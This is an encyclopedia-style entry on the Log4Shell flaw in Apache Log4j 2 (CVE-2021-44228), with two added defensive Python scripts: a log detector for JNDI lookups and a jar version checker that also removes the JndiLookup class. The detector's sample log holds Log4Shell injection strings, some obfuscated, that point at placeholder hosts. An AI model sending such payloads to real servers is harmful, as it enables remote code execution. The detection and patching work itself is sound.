CVE-2021-44228

CVE-2021-44228, also known as Log4Shell, is a critical remote code execution vulnerability in the Apache Log4j 2 Java logging library. The flaw stems from how Log4j 2 processes lookups via the Java Naming and Directory Interface (JNDI). By inserting a specially crafted log message that triggers a JNDI lookup to an attacker-controlled service (such as LDAP, RMI, or DNS), an attacker can cause the affected application to load and execute remote code on the host.
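Because Log4j 2 resolves the ${...} lookup syntax inside a message before acting on it, a log audit that only searches for the literal text "${jndi:" misses messages that Log4j itself would have resolved into a JNDI lookup (for example through its lower/upper or default-value lookup forms). The detector below is an added example, not code from the page, from Apache, or from any scanner project: it normalizes nested lookups the way Log4j's substitution does for that small subset, then reports the JNDI scheme it finds. The sample log lines are constructed, and the hostnames use the reserved .invalid domain as placeholders.

```python
import re

# Innermost lookup only: a body with no nested "$", "{" or "}" inside it.
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# After normalization, a JNDI lookup and the scheme it targets (ldap, rmi, dns, ...).
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)", re.IGNORECASE)

# Constructed sample log lines (not captured from any real system).
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 "-" "Mozilla/5.0"',
    '10.0.0.6 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 "-" "${jndi:ldap://example.invalid/a}"',
    '10.0.0.7 - - [10/Dec/2021:12:00:03 +0000] "GET / HTTP/1.1" 200 "-" "${${lower:J}ndi:rmi://example.invalid/b}"',
    '10.0.0.8 - - [10/Dec/2021:12:00:04 +0000] "GET / HTTP/1.1" 200 "-" "${${::-j}ndi:dns://example.invalid/c}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:05 +0000] "GET /app?home=${env:HOME} HTTP/1.1" 404 "-" "curl/7.79"',
]


def _resolve_inner(body: str) -> str:
    """Resolve one innermost lookup for the subset a detector cares about.

    Mirrors the Log4j lookup forms ${lower:x}, ${upper:x} and ${name:-default};
    any other lookup (jndi, env, ...) is left in place so it can be matched.
    """
    if body.startswith("lower:"):
        return body[len("lower:"):].lower()
    if body.startswith("upper:"):
        return body[len("upper:"):].upper()
    if ":-" in body:
        return body.split(":-", 1)[1]      # unknown lookup falls back to its default text
    return "${" + body + "}"                # unresolved: keep verbatim


def normalize(message: str, max_rounds: int = 20) -> str:
    """Resolve nested lookups from the inside out until nothing changes."""
    current, previous, rounds = message, None, 0
    while current != previous and rounds < max_rounds:
        previous = current
        current = INNER_LOOKUP.sub(lambda m: _resolve_inner(m.group(1)), current)
        rounds += 1
    return current


def scan_line(line: str):
    """Return the JNDI scheme (lower-cased) found in a line, or None if clean."""
    match = JNDI_LOOKUP.search(normalize(line))
    return match.group(1).lower() if match else None


def scan_log(lines):
    """Run the detector over a log and return one hit per offending line."""
    hits = []
    for number, line in enumerate(lines, start=1):
        scheme = scan_line(line)
        if scheme is not None:
            hits.append({"line": number, "scheme": scheme, "raw": line})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"line {hit['line']}: jndi lookup via {hit['scheme']}: {hit['raw']}")
```

Running the block over SAMPLE_LOG reports three hits (ldap, rmi and dns) and leaves the first and last lines alone; the ${env:HOME} lookup in the last line is not a JNDI lookup, so it is not flagged.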

Impact and scope: Log4j 2 is widely used in Java applications and services, so the vulnerability potentially affects a large surface of software across enterprise and consumer environments. The published base CVSS score for this issue has been described as critical, reflecting the ease of exploitation and the potential for full system compromise.

Affected versions and fixes: Initially, Log4j 2.x versions up to 2.14.1 were vulnerable. Apache released fixes beginning with version 2.15.0, which introduced mitigations by disabling vulnerable JNDI lookups by default. Subsequent updates (2.16.0 and later) provided further hardening and removal of exposed functionality, addressing related follow-on issues. Users are advised to upgrade to the latest Log4j 2.x release to ensure protection against this and related flaws.

Mitigations and guidance: In the interim, organizations can mitigate risk by setting the system property log4j2.formatMsgNoLookups=true or removing the JndiLookup class from the log4j-core jar. Additionally, restricting outbound network access to prevent connections to external LDAP/RMI/DNS services, auditing logs for exploit attempts, and applying patches across all affected applications are recommended steps.

Discovery and response: The vulnerability was publicly disclosed in December 2021 after discovery by security researchers, including teams at Alibaba Cloud, with rapid advisories and patches issued by Apache and software vendors to curb exploitation in the wild.
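To turn the version thresholds and the JndiLookup-removal mitigation above into a repeatable check, the script below assesses a log4j-core jar and, for a jar that cannot be upgraded yet, produces a copy with the JndiLookup class removed. This is an added example, not code from the page or from Apache. It assumes the class lives at org/apache/logging/log4j/core/lookup/JndiLookup.class and that the jar carries its version in the Maven pom.properties entry or the manifest's Implementation-Version attribute; the jar it operates on is constructed inline as a stand-in, not a real log4j-core artifact, and the status labels follow the thresholds given above (below 2.15.0 vulnerable, 2.15.0 mitigated, 2.16.0 and later fixed).

```python
import io
import re
import zipfile

# Assumed locations inside a log4j-core jar.
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPERTIES = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
MANIFEST = "META-INF/MANIFEST.MF"


def build_sample_jar(version: str, include_jndi: bool = True) -> bytes:
    """Constructed stand-in for a log4j-core jar; only the entries the check reads."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(MANIFEST, f"Manifest-Version: 1.0\r\nImplementation-Version: {version}\r\n")
        zf.writestr(POM_PROPERTIES,
                    f"groupId=org.apache.logging.log4j\nartifactId=log4j-core\nversion={version}\n")
        if include_jndi:
            zf.writestr(JNDI_LOOKUP_CLASS, b"\xca\xfe\xba\xbe")   # class-file magic only
        zf.writestr("org/apache/logging/log4j/core/Core.class", b"\xca\xfe\xba\xbe")
    return buf.getvalue()


def parse_version(text: str):
    """'2.14.1' -> (2, 14, 1); tolerates suffixes such as '-SNAPSHOT'."""
    m = re.match(r"(\d+)\.(\d+)\.(\d+)", text.strip())
    return tuple(int(p) for p in m.groups()) if m else None


def read_version(zf: zipfile.ZipFile):
    """Version from pom.properties, falling back to the manifest; None if absent."""
    for entry, key, sep in ((POM_PROPERTIES, "version", "="), (MANIFEST, "Implementation-Version", ":")):
        try:
            text = zf.read(entry).decode("utf-8", "replace")
        except KeyError:
            continue
        for line in text.splitlines():
            if line.startswith(key + sep):
                return line.split(sep, 1)[1].strip()
    return None


def assess_jar(jar_bytes: bytes) -> dict:
    """Classify a jar by version threshold and by presence of the JndiLookup class."""
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as zf:
        has_jndi = JNDI_LOOKUP_CLASS in set(zf.namelist())
        version = read_version(zf)
    parsed = parse_version(version) if version else None
    if parsed is None:
        status = "unknown-version"
    elif parsed >= (2, 16, 0):
        status = "fixed"
    elif parsed >= (2, 15, 0):
        status = "mitigated-2.15.0"     # JNDI lookups disabled by default; upgrade further
    elif has_jndi:
        status = "vulnerable"
    else:
        status = "class-removed"        # interim mitigation applied to an old version
    return {"version": version, "jndi_lookup_present": has_jndi, "status": status}


def remove_jndi_lookup(jar_bytes: bytes) -> bytes:
    """Rewrite the jar without the JndiLookup class entry (same effect as zip -d)."""
    src = zipfile.ZipFile(io.BytesIO(jar_bytes))
    out = io.BytesIO()
    with zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as dst:
        for info in src.infolist():
            if info.filename == JNDI_LOOKUP_CLASS:
                continue
            dst.writestr(info, src.read(info.filename))
    return out.getvalue()


if __name__ == "__main__":
    vulnerable = build_sample_jar("2.14.1")
    print("before:", assess_jar(vulnerable))
    print("after: ", assess_jar(remove_jndi_lookup(vulnerable)))
    print("2.16.0:", assess_jar(build_sample_jar("2.16.0")))
```

Removing the class is an interim step only; the assessment still reports the old version so that the jar remains on the upgrade list, which is the intent of the guidance to move to a current 2.x release.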